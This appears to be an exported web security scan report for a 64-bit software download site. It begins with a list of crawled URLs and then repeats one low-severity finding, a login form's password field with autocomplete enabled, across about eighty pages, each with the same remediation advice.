/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html
/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html
/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html
/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html
/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html
/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html
/categories/free-64-bit-desktop-downloads-4-0-d.html
/categories/free-64-bit-development-downloads-5-0-d.html
/categories/free-64-bit-education-downloads-6-0-d.html
/categories/free-64-bit-games-entertainment-downloads-7-0-d.html
/categories/free-64-bit-graphic-apps-downloads-8-0-d.html
/categories/free-64-bit-home-hobby-downloads-9-0-d.html
/categories/free-64-bit-multimedia-design-downloads-258-0-d.html
/categories/free-64-bit-network-internet-downloads-10-0-d.html
/categories/free-64-bit-security-privacy-downloads-11-0-d.html
/categories/free-64-bit-servers-downloads-12-0-d.html
/categories/free-64-bit-system-utilities-downloads-13-0-d.html
/categories/free-64-bit-web-development-downloads-14-0-d.html
/categories/free-64-bit-widgets-downloads-304-0-d.html
/contact.html
/download/t-64-bit-ozum-download-lhtivuds.html
/downloads/t-64-bit-communitymate-download-qeakzpwv.html
/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html
/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html
/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html
/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html
/downloads/t-64-bit-news-file-grabber-download-stclytop.html
/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html
/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html
/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html
/downloads/t-64-bit-oovoo-download-jrletedp.html
/downloads/t-64-bit-ozum-download-lhtivuds.html
/downloads/t-64-bit-ozum-download-lhtivuds.html/x22
/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html
/downloads/t-64-bit-pidgin-download-kkwthbed.html
/downloads/t-64-bit-rss-reader-download-avwkinlm.html
/downloads/t-64-bit-skype-download-szhzvwoz.html
/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html
/downloads/t-64-bit-teamspeak-download-opmulwsy.html
/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html
/downloads/t-64-bit-usenext-download-rizftkeg.html
/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html
/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html
/downloads/t-64-bit-windows-live-mail-download-melibvyx.html
/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html
/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html
/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html
/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html
/drivers/
/drivers/64-bit-vista-drivers.html
/featured-software.html
/linktous.html
/new-reviews.html
/new-software.html
/saved-software.html
/saved-software.html
/software-advanced.html
/submit-pad-file.html
/tellafriend.html
/top-software-downloads.html

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

3.1. http://www.x64bitdownload.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.2. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.3. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.4. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.5. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.6. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.7. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.8. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.9. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.10. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.11. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.12. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.13. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.14. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.15. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.16. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.17. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.18. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.19. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.20. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.21. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.22. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.23. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.24. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.25. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.26. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.27. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.28. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.29. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.30. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.31. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.32. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.33. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.34. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.35. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.36. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.37. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.38. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.39. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.40. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.41. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.42. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.43. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.44. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.45. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.46. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.47. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.48. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.49. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.50. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.51. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.52. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.53. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.54. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.55. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.56. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.57. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.58. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.59. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.60. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.61. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.62. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.63. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.64. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.65. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.66. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.67. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.68. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.69. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.70. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.71. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.72. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.73. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.74. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.75. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.76. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.77. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.78. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.79. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

3.80. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

